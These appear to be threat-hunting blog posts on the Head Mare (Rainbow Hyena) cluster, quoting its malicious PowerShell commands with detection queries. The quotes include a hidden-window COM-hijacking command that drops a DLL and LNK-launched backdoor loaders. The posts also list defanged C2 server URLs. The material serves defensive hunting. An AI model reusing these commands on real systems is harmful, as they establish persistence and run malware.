Know Your Adversary

Hello everyone! I've brought you another PowerShell (T1059.001) procedure you may use in your threat hunting missions!  Let's look inside a new report on Head Mare (we track this cluster as Rainbow Hyena ). The adversary downloaded archives with additional backdoors from a remote server and used PowerShell to expand it: powershell expand-archive -force -path C:\ProgramData\YandexUpdate\update.zip -destinationpath C:\ProgramData\YandexUpdate\ The threat actors chose ProgramData as a staging folder, so we can use it to build the query and look for susoicious events: event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: ("expand-archive" AND "programdata") See you tomorrow!

Hello everyone! Do you remember PowerShell has almost countless number of procedures? So today we'll look at another one, which includes the following technique:  Event Triggered Execution: Component Object Model Hijacking (T1546.015) . This time the example we are going to look at belongs to Head Mare (or Rainbow Hyena). One more time the adversary leveraged malicious LNK files in order to execute the following PowerShell command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -c "New-Item -Path 'HKCU:\Software\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InprocServer32' -Force|Set-Item -Value 'C:\ProgramData\winnt64_.dll';$r=[System.IO.Path]::Combine($(gl).Path,'Задание_на_оценку_N_2046_от_05_августа_2025_года.zip');if(Test-Path $r){[System.IO.File]::WriteAllBytes([System.IO.Path]::Combine($env:ProgramData,'winnt64_.dll'),([System.IO.File]::ReadAllBytes($r)|select -Skip 16 -First 642064));}el...

Hello everyone! Let's keep talking about C2 communications. And this time we'll look at an activity cluster we track as Rainbow Hyena (it's also known as Head Mare). Let's look at the following part of the report: After collecting initial information about the compromised system, the backdoor establishes a connection with the C2 server. The communication is carried out over HTTP, using GET and POST requests. The malware generates a GET request and accesses a URL in the following format: 91.239.148[.]21/poll?id=&hostname=&domain= As you can see, there's a certain pattern we can use for hunting even if we don't know the IP address of the server. Let's look at another example . It the same group, but the pattern is different: hxxp://195.58.54[.]39:80/connect hxxp://195.58.54[.]39/check hxxp://195.58.54[.]39/command hxxp://195.58.54[.]39/init And this is another thing you should notice, document and use for threat hunting, both internal and external. Se...

Hello everyone! Today we'll look at another curious example of PowerShell abuse - this time from Head Mare (we track this activity cluster as Rainbow Hyena ). The adversary distributed password protected archives with malicious LNK files. The LNK file executes the following PowerShell command to run  PhantomPyramid backdoor on the compromised system: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -c "$r=$(Get-Location).Path + '\\x417\x430\x44f\x432\x43a\x430_\x413\x423\x412_5_03\x414.zip';if(Test-Path $r) { cmd.exe /c start /B $r; } else { $f=$(Get-ChildItem -Path 'C:\Users\<USER>' -Recurse -Filter '\x417\x430\x44f\x432\x43a\x430_\x413\x423\x412_5_03\x414.zip' | Select-Object -First 1); if($f) { $r=$f.FullName; cmd.exe /c start /B $f.FullName; }; };if(-Not (Test-Path $r)) { $r=$(Get-ChildItem -Path 'C:\Users\<USER>\AppData\Local\Temp' -Recurse -Filter "\x417\x430\x44f\x432\x43a\x430_\...